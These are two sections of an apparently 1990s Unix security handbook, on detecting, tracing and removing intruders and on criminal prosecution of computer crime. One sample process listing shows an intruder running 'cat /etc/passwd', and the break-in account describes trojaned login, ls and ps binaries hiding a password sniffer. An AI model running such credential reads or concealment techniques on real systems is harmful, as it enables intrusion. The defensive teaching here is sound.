a user, but it is usually considered odd for the same user to be logged in on two separate dial-in lines at the same time.)<br />

A user who is not a programmer but who is nevertheless running a compiler or debugger.<br />

A user who is making heavy and uncharacteristic use of the network.<br />

A user who is initiating many dialout calls.<br />

A user who does not own a modem logged into the computer over a dial-in line.<br />

A person who is executing commands as the superuser.<br />

Network connections from previously unknown machines, or from sites that shouldn't be contacting yours for any reason.<br />

A user who is logged in while on vacation or outside of normal working hours (e.g., a secretary dialed in by phone at 1:00<br />

a.m. or a computer science graduate student working at 9:00 a.m.).<br />

<strong>UNIX</strong> provides a number of commands to help you figure out who is doing what on your system. The finger, users, whodo, w,<br />

and who commands all display lists of the users who are currently logged in. The ps and w commands help you determine what<br />

any user is doing at any given time; ps displays a more comprehensive report, and w displays an easy-to-read summary. The<br />

netstat command can be used to check on current network connections and activity.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch24_02.htm (1 of 9) [2002-04-12 10:45:04]


[Chapter 24] 24.2 Discovering an Intruder<br />

If you are a system administrator, you should be in the habit of issuing these commands frequently to monitor user activity. After<br />

a while, you will begin to associate certain users with certain commands. Then, when something out of the ordinary happens, you<br />

will have cause to take a closer look.<br />

Be aware, however, that all of these commands can be "fooled" by computer intruders with sufficient expertise. For example, w,<br />

users, and finger all check the /etc/utmp file to determine who is currently logged in to the computer. If an intruder erases or<br />

changes his entry in this file, these commands will not report the intruder's presence. Also, some systems fail to update this file,<br />

and some window systems do not properly update it with new entries, so even when the file is protected, it may not have accurate<br />

information.<br />

As the ps command actually examines the kernel's process table, it is more resistant to subversion than the commands that<br />

examine the /etc/utmp file. However, an intruder who also has attained superuser access on your system can modify the ps<br />

command or the code in the system calls it uses so that it won't print his or her processes. Furthermore, any process can modify its<br />

argv arguments, allowing it to display whatever it wishes in the output of the ps command. If you don't believe what these<br />

commands are printing, you might be right!<br />

24.2.2 What to Do When You Catch Somebody<br />

You have a number of choices when you discover an intruder on your system:<br />

1.<br />

2.<br />

3.<br />

4.<br />

5.<br />

Ignore them.<br />

Try to contact them with write or talk, and ask them what they want.<br />

Try to trace the connection and identify the intruder.<br />

Break their connection by killing their processes, unplugging the modem or network, or turning off your computer.<br />

Contact a FIRST (Forum of Incident Response and <strong>Sec</strong>urity Teams) team (e.g., the CERT-CC[2]) to notify them of the<br />

attack.<br />

[2] See Appendix F, Organizations, for a complete list of FIRST teams.<br />

What you do is your choice. If you are most inclined towards option #1, you probably should reread Chapter 1, Introduction, and<br />

Chapter 2, Policies and Guidelines, . Ignoring an intruder who is on your system essentially gives him or her free reign to do harm<br />

to you, your users, or others on the network.<br />

If you choose option #2, keep a log of everything the intruder sends back to you, then decide whether to pursue one of the other<br />

options. Options #3 and #4 are discussed in the sections "Tracing a Connection" and "Getting Rid of the Intruder" that follow.<br />

NOTE: Some intruders are either malicious in intent, or extremely paranoid about being caught. If you contact them,<br />

they may react by trying to delete everything on disk so as to hide their activities. If you try to contact an intruder<br />

who turns out to be one of these types, be certain you have a set of extremely current backups!<br />

If the intruder is logged into your computer over the network, you may wish to trace the connection first, because it is usually<br />

much easier to trace an active network connection than one that has been disconnected.<br />

After the trace, you may wish to try to communicate with the intruder using the write or talk programs. If the intruder is connected<br />

to your computer by a physical terminal, you may wish to walk over to that terminal and confront the person directly (then again,<br />

you might not!).<br />

NOTE: Avoid using mail or talk to contact the remote site if you are trying to trace the connection without tipping<br />

off the intruder, because the remote root account on the remote site may be compromised. Try to use the telephone, if<br />

at all possible, before sending email. If you must send a message, send something innocuous, such as "could you<br />

please give me a call: we are having problems with your mailer." Of course, if somebody calls you, verify who they<br />

are.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch24_02.htm (2 of 9) [2002-04-12 10:45:04]


[Chapter 24] 24.2 Discovering an Intruder<br />

24.2.3 Monitoring the Intruder<br />

You may wish to monitor the intruder's actions to figure out what he is doing. This will give you an idea if he is modifying your<br />

accounting database, or simply rummaging around through your users' email.<br />

There are a variety of means that you can use for monitoring the intruder's actions. The simplest way is to use programs such as ps<br />

or lastcomm to see which processes the intruder is using.<br />

Depending on your operating system, you may be able to monitor the intruder's keystrokes using programs such as ttywatch or<br />

snoop. These commands can give you a detailed, packet-by-packet account of information sent over a network. They can also give<br />

you a detailed view of what an intruder is doing. For example:<br />

# snoop<br />

asy8.vineyard.net -> next SMTP C port=1974<br />

asy8.vineyard.net -> next SMTP C port=1974 MAIL FROM: asy8.vineyard.net SMTP R port=1974 250 next SMTP C port=1974<br />

asy8.vineyard.net -> next SMTP C port=1974 RCPT TO: asy8.vineyard.net SMTP R port=1974 250 next SMTP C port=1974<br />

asy8.vineyard.net -> next SMTP C port=1974 DATA\r\n<br />

next -> asy8.vineyard.net SMTP R port=1974 354 Enter mail, end<br />

In this case, an email message was intercepted as it was sent from asy8.vineyard.net to the computer next. As the above example<br />

shows, these utilities will give you a detailed view of what people on your system are doing, and they have a great potential for<br />

abuse.<br />

You should be careful with the tools that you install on your system, as these tools can be used against you, to monitor your<br />

monitoring. Also, consider using tools such as snoop on another machine (not the one that has been compromised). Doing so<br />

lessens the chance of being discovered by the intruder.<br />

24.2.4 Tracing a Connection<br />

The ps, w, and who commands all report the terminals to which each user (or each process) is attached. Terminal names like<br />

/dev/tty01 may be abbreviated to tty01 or even to 01. Generally, names like tty01, ttya, or tty4a represent physical serial lines,<br />

while names that contain the letters p, q, or r (such as ttyp1) refer to network connections (virtual ttys, also called<br />

pseudo-terminals or ptys).<br />

If the intruder has called your computer by telephone, you may be out of luck. In general, telephone calls can be traced only by<br />

prior arrangement with the telephone company. However, many telephone companies offer special features such as<br />

CALL*TRACE and CALLER*ID (CNID), which can be used with modem calls as easily as with voice calls. If you have already<br />

set up the service and installed the appropriate hardware, all you need to do is activate it. Then you can read the results.<br />

If the intruder is logged in over the network, you can use the who command to determine quickly the name of the computer that<br />

the person may have used to originate the connection. Simply type who:<br />

% who<br />

orpheus console Jul 16 16:01<br />

root tty01 Jul 15 20:32<br />

jason ttyp1 Jul 16 18:43 (robot.ocp.com)<br />

devon ttyp2 Jul 16 04:33 (next.cambridge.m)<br />

%<br />

In this example, the user orpheus is logged in at the console, user root is logged on at tty01 (a terminal connected by a serial line),<br />

and jason and devon are both logged in over the network: jason from robot.ocp.com, and devon from next.cambridge.ma.us.<br />

Some versions of the who command display only the first 16 letters of the hostname of the computer that originated the<br />

connection. (The machine name is stored in a 16-byte field in /etc/utmp; some versions of <strong>UNIX</strong> store more letters.) To see the<br />

complete hostname, you may need to use the netstat command (described in Chapter 16, TCP/IP Networks). You will also have to<br />

use netstat if the intruder has deleted or modified the /etc/utmp file to hide his presence. Unfortunately, netstat does not reveal<br />

which network connection is associated with which user. (Of course, if you have the first 16 characters of the hostname, you<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch24_02.htm (3 of 9) [2002-04-12 10:45:04]


[Chapter 24] 24.2 Discovering an Intruder<br />

should be able to figure out which is which, even if /etc/utmp has been deleted. You can still use netstat and look for connections<br />

from unfamiliar machines.) Luckily, most modern versions of <strong>UNIX</strong>, including SVR4, report the entire machine name.<br />

Let's say that in this example we suspect Jason is an intruder, because we know that the real Jason is at a yoga retreat in Tibet<br />

(with no terminals around). Using who and netstat, we determine that the intruder who has appropriated Jason's account is logged<br />

in remotely from the computer robot.ocp.com. We can now use the finger command to see which users are logged onto that<br />

remote computer:<br />

% finger @robot.ocp.com<br />

[robot.ocp.com]<br />

Login Name TTY Idle When<br />

olivia Dr. Olivia Layson co 12d Sun 11:59<br />

wonder Wonder Hacker p1 Sun 14:33<br />

%<br />

Of course, this method doesn't pin the attacker down, because the intruder may be using the remote machine only as a relay point.<br />

Indeed, in the above example, Wonder Hacker is logged into ttyp1, which is another virtual terminal. He's probably coming from<br />

another machine, and simply using robot.ocp.com as a relay point. You would probably not see a username like Wonder Hacker.<br />

More likely, you would only see an assorted list of apparently legitimate users and have to guess who the attacker is. Even if you<br />

did see a listing such as that, you can't assume anything about who is involved. For instance, Dr. Layson could be conducting<br />

industrial espionage on your system, using a virtual terminal (e.g., xterm) that is not listed as a logged in session!<br />

If you have an account on the remote computer, log into it and find out who is running the rlogin or telnet command that is<br />

coming into your computer. In any event, consider contacting the system administrator of that remote computer and alert him or<br />

her to the problem.<br />

24.2.4.1 Other tip-offs<br />

There are many other tip-offs that an intruder might be logged onto your system. For example, you may discover that shells are<br />

running on terminals that no one seems to be logged into at the moment. You may discover open network connections to machines<br />

you do not recognize. Running processes may be reported by some programs but not others.<br />

Be suspicious and nosy.<br />

24.2.4.2 How to contact the system administrator of a computer you don't know<br />

Often, you can't figure out the name and telephone number of the system administrator of a remote machine, because <strong>UNIX</strong><br />

provides no formal mechanism for identifying such people.<br />

One good way is to contact the appropriate incident response team for the designated security person at the organization. Another<br />

way to find out the telephone number and email address of the remote administrator is to use the whois command to search the<br />

Network Information Center (NIC) registration database. If your system does not have a whois command, you can simply telnet to<br />

the NIC site. Below is an example of how to find the name and phone number of a particular site administrator.<br />

The NIC maintains a database of the names, addresses, and phone numbers of significant network users, as well as the contact<br />

people for various hosts and domains. If you can connect to the host whois.internic.net via telnet, you may be able to get the<br />

information you need. Try the following:<br />

1.<br />

2.<br />

3.<br />

4.<br />

5.<br />

Connect to the host whois.internic.net via telnet.<br />

At the > prompt, type whois.<br />

Try typing host robot.ocp.com (using the name of the appropriate machine, of course). The server may return a record<br />

indicating the administrative contact for that machine.<br />

Try typing domain ocp.com (using the appropriate domain). The server may return a record indicating the administrative<br />

contact for that domain.<br />

When done, type quit to disconnect.<br />

Here is an example, showing how to get information about the domain whitehouse.gov:<br />

% telnet whois.internic.net<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch24_02.htm (4 of 9) [2002-04-12 10:45:04]


[Chapter 24] 24.2 Discovering an Intruder<br />

Trying 198.41.0.6 ...<br />

Connected to rs.internic.net.<br />

Escape character is `^]'.<br />

SunOS <strong>UNIX</strong> 4.1 (rs1) (ttyp1)<br />

***********************************************************************<br />

* -- InterNIC Registration Services Center --<br />

*<br />

* For wais, type: WAIS <br />

* For the *original* whois type: WHOIS [search string] <br />

* For referral whois type: RWHOIS [search string] <br />

*<br />

* For user assistance call (703) 742-4777<br />

# Questions/Updates on the whois database to HOSTMASTER@internic.net<br />

* Please report system problems to ACTION@internic.net<br />

***********************************************************************<br />

Please be advised that use constitutes consent to monitoring<br />

(Elec Comm Priv Act, 18 USC 2701-2711)<br />

Cmdinter Ver 1.3 Tue Oct 17 21:51:53 1995 EST<br />

[xterm] InterNIC > whois<br />

Connecting to the rs Database . . . . . .<br />

Connected to the rs Database<br />

Whois: whitehouse.gov<br />

Executive Office of the President USA (WHITEHOUSE-HST) WHITEHOUSE.GOV<br />

198.137.240.100<br />

Whitehouse Public Access (WHITEHOUSE-DOM) WHITEHOUSE.GOV<br />

Whois: whitehouse-dom<br />

Whitehouse Public Access (WHITEHOUSE-DOM)<br />

Executive Office of the President USA<br />

Office of Administration<br />

Room NEOB 4208<br />

725 17th Street NW<br />

Washington, D.C. 20503<br />

Domain Name: WHITEHOUSE.GOV<br />

Administrative Contact:<br />

Fox, Jack S. (JSF) fox_j@EOP.GOV<br />

(202) 395-7323<br />

Technical Contact, Zone Contact:<br />

Ranum, Marcus J. (MJR) mjr@BSDI.COM<br />

(410) 889-6449<br />

Record last updated on 17-Oct-94.<br />

Record created on 17-Oct-94.<br />

Domain servers in listed order:<br />

GATEKEEPER.EOP.GOV 198.137.241.3<br />

ICM1.ICP.NET 192.94.207.66<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch24_02.htm (5 of 9) [2002-04-12 10:45:04]


[Chapter 24] 24.2 Discovering an Intruder<br />

Whois: quit<br />

[xterm] InterNIC > quit<br />

Tue Oct 17 21:55:30 1995 EST<br />

Connection closed by foreign host.<br />

%<br />

In addition to looking for information about the host, you can look for information about the network domain. You may find that<br />

technical contacts are more helpful than administrative contacts. If that approach fails, you can attempt to discover the site's<br />

network service provider (discovered by sending packets to the site using traceroute) and call them to see if they have contact<br />

information. Even if the site's network service provider will tell you nothing, he or she will often forward messages to the relevant<br />

people. In an emergency, you can call the organization's main number and ask the security guard to contact the computer center's<br />

support staff.<br />

If you are attempting to find out information about a U.S. military site (the hostname ends in .mil), you need to try the whois<br />

command at nic.ddn.mil instead of the one at the InterNIC.<br />

Another thing to try is to finger the root account of the remote machine. Occasionally this will produce the desired result:<br />

% finger root@robot.ocp.com<br />

[robot.ocp.com]<br />

Login name: root in real life: Joel Wentworth<br />

Directory: / Shell: /bin/csh<br />

Last login Sat April 14, 1990 on /dev/tty<br />

Plan:<br />

For information regarding this computer, please contact<br />

Joel Wentworth at 301-555-1212<br />

More often, unfortunately, you'll be given useless information about the root account:<br />

% finger root@robot.ocp.com<br />

[robot.ocp.com]<br />

Login name: root in real life: Operator<br />

Directory: / Shell: /bin/csh<br />

Last login Mon Dec. 3, 1990 on /dev/console<br />

No plan<br />

In these cases, you can try to figure out who is the computer's system administrator by connecting to the computer's sendmail<br />

daemon and identifying who gets mail for the root or postmaster mailboxes:<br />

% telnet robot.ocp.com smtp<br />

Trying...<br />

Connected to robot.ocp.com<br />

Escape character is "^]".<br />

220 robot.ocp.com Sendmail NeXT-1.0 (From Sendmail 5.52)/NeXT-1.0 ready at Sun, 2<br />

Dec 90 14:34:08 EST<br />

helo mymachine.my.domain.com<br />

250 robot.ocp.com Hello mymachine.my.domain.com, pleased to meet you<br />

vrfy postmaster<br />

250 Joel Wentworth <br />

expn root<br />

250 Joel Wentworth <br />

quit<br />

221 robot.ocp.com closing connection<br />

Connection closed by foreign host.<br />

You can then use the finger command to learn this person's telephone number.<br />

Unfortunately, many system administrators have disabled their finger command, and the sendmail daemon may not honor your<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch24_02.htm (6 of 9) [2002-04-12 10:45:04]


[Chapter 24] 24.2 Discovering an Intruder<br />

requests to verify or expand the alias. However, you may still be able to identify the contact person.<br />

If all else fails, you can send mail to the " postmaster" of the indicated machine and hope it gets read soon. Do not mention a<br />

break-in in the message - mail is sometimes monitored by intruders. Instead, give your name and phone number, indicate that the<br />

matter is important, and ask the postmaster to call you. (Offering to accept collect calls is a nice gesture and may improve the<br />

response rate.) Of course, after you've phoned, find out the phone number of the organization you're dealing with and try phoning<br />

back - just to be sure that it's the administrator who phoned (and not the intruder who read your email and deleted it before it got<br />

to the administrator). You can also contact the folks at one of the FIRST teams, such as the CERT-CC. They have some additional<br />

resources, and they may be able to provide you with contact information.<br />

24.2.5 Getting Rid of the Intruder<br />

Killing your computer's power - turning it off - is the very quickest way to get an intruder off your computer and prevent him from<br />

doing anything else - including possibly further damage. Unfortunately, this is a drastic action. Not only does it stop the intruder,<br />

but it also interrupts the work of all of your legitimate users. It may also delete evidence you night need in court some day, delete<br />

necessary evidence of the break-in, such as running processes (e.g., mailrace), and cause the system to be damaged when you<br />

reboot because of the Trojaned startup scripts. In addition, the <strong>UNIX</strong> filesystem does not deal with sudden power loss very<br />

gracefully: pulling the plug might do significantly more damage than the intruder might ever do.<br />

In some cases, you can get rid of an intruder by politely asking him or her to leave. Inform the person that breaking into your<br />

computer is both antisocial and illegal. Some computer trespassers have the motivation of a child sneaking across private property;<br />

they often do not stop to think about the full impact of their actions. However, don't bet on your intruder being so simplistic, even<br />

if he acts that way. (And keep in mind our warning earlier in this chapter.)<br />

If the person refuses to leave, you can forcibly kill his or her processes with the kill command. Use the ps command to get a list of<br />

all of the user's process numbers, change the password of the penetrated account, and finally kill all of the attacker's processes<br />

with a single kill command. For example:<br />

# ps -aux<br />

USER PID %CPU %MEM VSIZE RSIZE TT STAT TIME COMMAND<br />

root 1434 20.1 1.4 968K 224K 01 R 0:00 ps aux<br />

nasty 147 1.1 1.9 1.02M 304K p3 S 0:07 - (csh)<br />

nasty 321 10.0 8.7 104K 104K p3 S 0:09 cat /etc/passwd<br />

nasty 339 8.0 3.7 2.05M 456K p3 S 0:09 rogue<br />

...<br />

# passwd nasty<br />

Changing password for nasty.<br />

New password: rogue32<br />

Retype new password: rogue32<br />

# kill -9 147 321 339<br />

You are well-advised to change the password on the account before you kill the processes - especially if the intruder is logged in<br />

as root. If the intruder is a faster typist than you are, you might find yourself forced off before you know it! Also bear in mind that<br />

most intruders will install a back door into the system. Thus, even if you change the password, that may not be sufficient to keep<br />

them off: you may need to take the system to single-user mode and check the system out, first.<br />

As a last resort, you can physically break the connection. If the intruder has dialed in over a telephone line, you can turn off the<br />

modem - or unplug it from the back of the computer. If the intruder is connected through the network, you can unplug the network<br />

connector - although this will also interrupt service for all legitimate users. Once the intruder is off your machine, try to determine<br />

the extent of the damage done (if any), and seal the holes that let the intruder get in. You also should check for any new holes that<br />

the intruder may have created. This is an important reason for creating and maintaining the checklists described in Chapter 9,<br />

Integrity Management.<br />

24.2.6 Anatomy of a Break-in<br />

The following story is true. The names and a few details have been changed to protect people's jobs.<br />

Late one night in November 1995, a part-time computer consultant at a Seattle-based firm logged into one of the computers that<br />

he occasionally used. The system seemed sluggish, so he ran the top command to get an idea of what was slowing down the<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch24_02.htm (7 of 9) [2002-04-12 10:45:04]


[Chapter 24] 24.2 Discovering an Intruder<br />

system. The consultant noticed that a program called vs was consuming a large amount of system resources. The program was<br />

running as superuser.<br />

Something didn't look right. To get more information, the programmer ran the ps command. That's when things got stranger still -<br />

the mysterious program didn't appear when ps was run. So the occasional system manager used the top command again, and, sure<br />

enough, the vs program was still running.<br />

The programmer suspected a break-in. He started looking around the filesystem using the Emacs dired command and found the vs<br />

program in a directory called /var/.e. That certainly didn't look right. So the programmer went to his shell window, did a chdir() to<br />

the /var directory, and then did an ls -a. But the ls program didn't show the directory /var/.e. Nevertheless, the program was<br />

definitely there: it was still visible from the Emacs dired command.<br />

The programmer was now pretty sure that somebody had broken into the computer. And the attack seemed sophisticated, because<br />

system commands appeared to have been altered to hide evidence of the break-in. Not wanting to let the break-in proceed further,<br />

the operator wanted to shut down the computer. But he was afraid that the attacker might have booby-trapped the /etc/halt<br />

command to destroy traces of the break-in. So before the programmer shut down the system, he used the tar command to make a<br />

copy of the directory /var/.e, as well as the directories /bin and /etc. As soon as the tar file was made, he copied it to another<br />

computer and halted the system.<br />

The following morning, the programmer made the following observations from the tar file:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Somebody had broken into the system.<br />

The program /bin/login had been modified so that anybody on the <strong>Internet</strong> could log into the root account by trying a<br />

special password.<br />

The /var/.e/vs program that had been left running was a password sniffing program. It listened on the company's local area<br />

network for users typing their passwords; these passwords were then sent to another computer elsewhere on the <strong>Internet</strong>.<br />

The program /bin/ls and /bin/ps had been modified so that they would not display the directory /var/.e.<br />

The inode creation dates and the modification times on the files /bin/ls, /bin/ps and /bin/login had been reset to their original<br />

dates before the modifications took place. The checksums for the modified commands (as computed with the sum<br />

command) matched those of the original, unmodified versions. But a comparison of the programs with a backup made the<br />

previous month revealed that the programs had been changed.<br />

It was 10:00 p.m. at night when the break-in was discovered. Nevertheless, the consultant telephoned the system manager at<br />

home. When he did, he discovered something else:<br />

●<br />

The computer's system manager had known about the break-in for three days, but had not done anything about it. The<br />

reason: she feared that the intruder had created numerous holes in their system's security, and was afraid that if she angered<br />

the intruder, that person might take revenge by deleting important files or shutting down the system.<br />

In retrospect, this was rather stupid behavior. Allowing the intruder to stay on the system let him collect more passwords from<br />

users of the system. The delay also allowed for plenty of time to make yet further modifications to the system. If it was<br />

compromised before, it was certainly compromised now!<br />

Leaving the intruder alone also left the company in a precarious legal position. If the intruder used the system to break in<br />

anywhere else, the company might be held partially liable in a lawsuit because they left the intruder with free run of the<br />

compromised system.<br />

So, what should the system manager have done when she first discovered the break-in? Basically, the same thing as what the<br />

outside consultant did: take a snapshot of the system to tape or another disk, isolate the system, and then investigate. If the staff<br />

was worried about some significant files being damaged, they should have done a complete backup right away to preserve<br />

whatever they could. If the system had been booby-trapped and a power failure occurred, they would have lost everything as<br />

surely as if they had shut down the system themselves.<br />

The case above is typical of many break-ins that have occurred in 1994 and 1995. The attackers have access to one of many<br />

"toolkits" used to break into systems, install password sniffers, and alter system programs to hide their presence. Many of the<br />

users of these toolkits are quite ignorant of how they work. Some are even unfamiliar with <strong>UNIX</strong>: we have heard many stories of<br />

monitored systems compromised with these sophisticated toolkits, only to result in the intruders attempting to use DOS commands<br />

to look at files!<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch24_02.htm (8 of 9) [2002-04-12 10:45:04]


[Chapter 24] 24.2 Discovering an Intruder<br />

24.1 Prelude 24.3 The Log Files:<br />

Discovering an Intruder's<br />

Tracks<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch24_02.htm (9 of 9) [2002-04-12 10:45:04]


[Chapter 26] 26.2 Criminal Prosecution<br />

Chapter 26<br />

Computer <strong>Sec</strong>urity and U.S. Law<br />

26.2 Criminal Prosecution<br />

You are free to contact law-enforcement personnel any time you believe that someone has broken a<br />

criminal statute. You start the process by making a formal complaint to a law-enforcement agency. A<br />

prosecutor will likely decide if the allegations should be investigated and what (if any) charges should be<br />

filed.<br />

In some cases (perhaps a majority of them), criminal investigation will not help your situation. If the<br />

perpetrators have left little trace of their activity and the activity is not likely to recur, or if the<br />

perpetrators are entering your system through a computer in a foreign country, you are not likely to trace<br />

or arrest the individuals involved. Many experienced computer intruders will leave little tracing evidence<br />

behind.[2]<br />

[2] Although few computer intruders are as clever as they believe themselves to be.<br />

There is no guarantee that a criminal investigation will ever result from a complaint that you file. The<br />

prosecutor involved (Federal, state, or local) will need to decide which, if any, laws have been broken,<br />

the seriousness of the crime, the availability of trained investigators, and the probability of a conviction.<br />

Remember that the criminal justice system is very overloaded; new investigations are started only for<br />

very severe violations of the law or for cases that warrant special treatment. A case in which $200,000<br />

worth of data is destroyed is more likely to be investigated than is a case in which someone is repeatedly<br />

trying to break the password of your home computer.<br />

Investigations can also place you in an uncomfortable and possibly dangerous position. If unknown<br />

parties are continuing to break into your system by remote means, law-enforcement authorities may ask<br />

you to leave your system open, thus allowing the investigators to trace the connection and gather<br />

evidence for an arrest. Unfortunately, if you leave your system open after discovering that it is being<br />

misused, and the perpetrator uses your system to break into or damage another system elsewhere, you<br />

may be the target of a third-party lawsuit. Cooperating with law-enforcement agents is not a sufficient<br />

shield from such liability. Before putting yourself at risk in this way, you should discuss alternatives with<br />

your lawyer.<br />

26.2.1 The Local Option<br />

One of the first things you must decide is to whom you should report the crime. Usually, you should deal<br />

with local or state authorities, if at all possible. Every state currently has laws against some sort of<br />

computer crime. If your local law-enforcement personnel believe that the crime is more appropriately<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch26_02.htm (1 of 8) [2002-04-12 10:45:05]


[Chapter 26] 26.2 Criminal Prosecution<br />

investigated by the Federal government, they will suggest that you contact Federal authorities.<br />

You cannot be sure whether your problem will receive more attention from local authorities or from<br />

Federal authorities. Local authorities may be more responsive because you are not as likely to be<br />

competing with a large number of other cases (as frequently occurs at the Federal level). Local<br />

authorities may also be more likely to be interested in your problems, no matter how small the problems<br />

may be. At the same time, local authorities may be reluctant to take on high-tech investigations where<br />

they have little expertise.[3] Many Federal agencies have expertise that can be brought in quickly to help<br />

deal with a problem. One key difference is that investigation and prosecution of juveniles is more likely<br />

to be done by state authorities than by Federal authorities.<br />

[3] Although in some venues, there are very experienced local law-enforcement officers, and<br />

they may be more experienced than a typical Federal officer.<br />

Some local law-enforcement agencies may be reluctant to seek outside help or to bring in Federal agents.<br />

This may keep your particular case from being investigated properly.<br />

In many areas, because the local authorities do not have the expertise or background necessary to<br />

investigate and prosecute computer-related crimes, you may find that they must depend on you for your<br />

expertise. In many cases, you will be involved with the investigation on an ongoing basis - possibly to a<br />

great extent. You may or may not consider this a productive use of your time.<br />

Our best advice is to contact local law enforcement before any problem occurs, and get some idea of<br />

their expertise and willingness to help you in the event of a problem. The time you invest up front could<br />

pay big dividends later on if you need to decide who to call at 2 a.m. on a holiday because you have<br />

found evidence that someone is making unauthorized use of your system.<br />

26.2.2 Federal Jurisdiction<br />

Although you might often prefer to deal with local authorities, you should contact Federal authorities if<br />

you:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Are working with classified or military information<br />

Have involvement with nuclear materials or information<br />

Work for a Federal agency and its equipment is involved<br />

Work for a bank or handle regulated financial information<br />

Are involved with interstate telecommunications<br />

Believe that people from out of the state or out of the country are involved with the crime<br />

Offenses related to national security, fraud, or telecommunications are usually handled by the FBI. Cases<br />

involving financial institutions, stolen access codes, or passwords are generally handled by the U.S.<br />

<strong>Sec</strong>ret Service. However, other Federal agents may also have jurisdiction in some cases; for example, the<br />

Customs Department, the U.S. Postal Service, and the Air Force Office of Investigations have all been<br />

involved in computer-related criminal investigations.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch26_02.htm (2 of 8) [2002-04-12 10:45:05]


[Chapter 26] 26.2 Criminal Prosecution<br />

Luckily, you don't need to determine jurisdiction on your own. If you believe that a Federal law has been<br />

violated in your incident, call the nearest U.S. Attorney's office and ask them who you should contact.<br />

Often, that office will have the name and contact information for a specific agent, or office in which the<br />

personnel have special training in investigating computer-related crimes.<br />

26.2.3 Federal Computer Crime Laws<br />

There are many Federal laws that can be used to prosecute computer-related crimes. Usually, the choice<br />

of law pertains to the type of crime, rather than whether the crime was committed with a computer, a<br />

phone, or pieces of paper. Depending on the circumstances, laws relating to wire fraud, espionage, or<br />

criminal copyright violation may come into play.<br />

Some likely laws that might be used in prosecution include:<br />

18 U.S.C. 646<br />

Embezzlement by a bank employee.<br />

18 U.S.C. 793<br />

Gathering, transmitting, or losing defense information.<br />

18 U.S.C. 912<br />

Impersonation of a government employee to obtain a thing of value.<br />

18 U.S.C. 1005<br />

False entries in bank records.<br />

18 U.S.C. 1006<br />

False entries in credit institution records.<br />

18 U.S.C. 1014<br />

False statements in loan and credit applications.<br />

18 U.S.C. 1029<br />

Credit Card Fraud Act of 1984.<br />

18 U.S.C. 1030<br />

Computer Fraud and Abuse Act.<br />

18 U.S.C. 1343<br />

Wire fraud (use of phone, wire, radio, or television transmissions to further a scheme to defraud).<br />

18 U.S.C. 1361<br />

Malicious mischief to government property.<br />

18 U.S.C. 2071<br />

Concealment, removal, or mutilation of public records.<br />

18 U.S.C. 2314<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch26_02.htm (3 of 8) [2002-04-12 10:45:05]


[Chapter 26] 26.2 Criminal Prosecution<br />

Interstate transportation of stolen property.<br />

18 U.S.C. 2319<br />

Willful infringement of a copyright for profit.<br />

18 U.S.C. 2701-2711<br />

Electronic Communications Privacy Act.<br />

Privacy and the Electronic Communications Privacy Act<br />

Passed in 1986, the Electronic Communications Privacy Act (ECPA) was intended to provide the same<br />

security for electronic mail as users of the U.S. Postal Service enjoy. In particular, the ECPA defines as a<br />

felony, under certain circumstances, reading other people's electronic mail. The ECPA also details the<br />

circumstances under which information may be turned over to Federal agents.<br />

To date, there has not been enough prosecution under the ECPA to determine whether this law has met<br />

its goal. The law appears to provide some protection for systems carrying mail and for mail files, but the<br />

law does not clearly provide protection to every system. If your system uses or supports electronic mail,<br />

consult with your attorney to determine how the law might affect you and your staff.<br />

In the coming years, we fully expect new laws to be passed governing crime on networks and malicious<br />

mischief on computers. We also expect some existing laws to be modified to extend coverage to certain<br />

forms of data used on computers. Luckily, you don't need to carefully track each and every piece of<br />

legislation in force (unless you really want to): the decision about which laws to use, if any, will be up to<br />

the U.S. Attorney for your district.<br />

26.2.4 Hazards of Criminal Prosecution<br />

There are many potential problems in dealing with law-enforcement agencies, not the least of which is<br />

their lack of experience with computer criminal-related investigations. Sadly, there are still many Federal<br />

agents who are not well versed with computers and computer crime. In most local jurisdictions, there<br />

may be even less expertise. Your case will be probably be investigated by an agent who has little or no<br />

training in computing.<br />

Computer-illiterate agents will sometimes seek your assistance and try to understand the subtleties of the<br />

case. Other times, they will ignore helpful advice - perhaps to hide their own ignorance - often to the<br />

detriment of the case and to the reputation of the law-enforcement community.<br />

If you or your personnel are asked to assist in the execution of a search warrant, to help identify material<br />

to be searched, be sure that the court order directs such "expert" involvement. Otherwise, you may find<br />

yourself complicating the case by appearing as an overzealous victim. You will usually benefit by<br />

recommending an impartial third party to assist the law-enforcement agents.<br />

The attitude and behavior of the law-enforcement officers can cause you major problems. Your<br />

equipment might be seized as evidence, or held for an unreasonable length of time for examination. If<br />

you are the victim and are reporting the case, the authorities will usually make every attempt to<br />

coordinate their examinations with you, to cause you the least amount of inconvenience. However, if the<br />

perpetrators are your employees, or if regulated information is involved (bank, military, etc.), you might<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch26_02.htm (4 of 8) [2002-04-12 10:45:05]


[Chapter 26] 26.2 Criminal Prosecution<br />

have no control over the manner or duration of the examination of your systems and media. This problem<br />

becomes more severe if you are dealing with agents who need to seek expertise outside their local offices<br />

to examine the material. Be sure to keep track of downtime during an investigation as it may be included<br />

as part of the damage during prosecution and any subsequent civil suit.<br />

An investigation is another situation in which backups can be extremely valuable. You might even make<br />

use of your disaster-recovery plan, and use a standby or spare site while your regular system is being<br />

examined.<br />

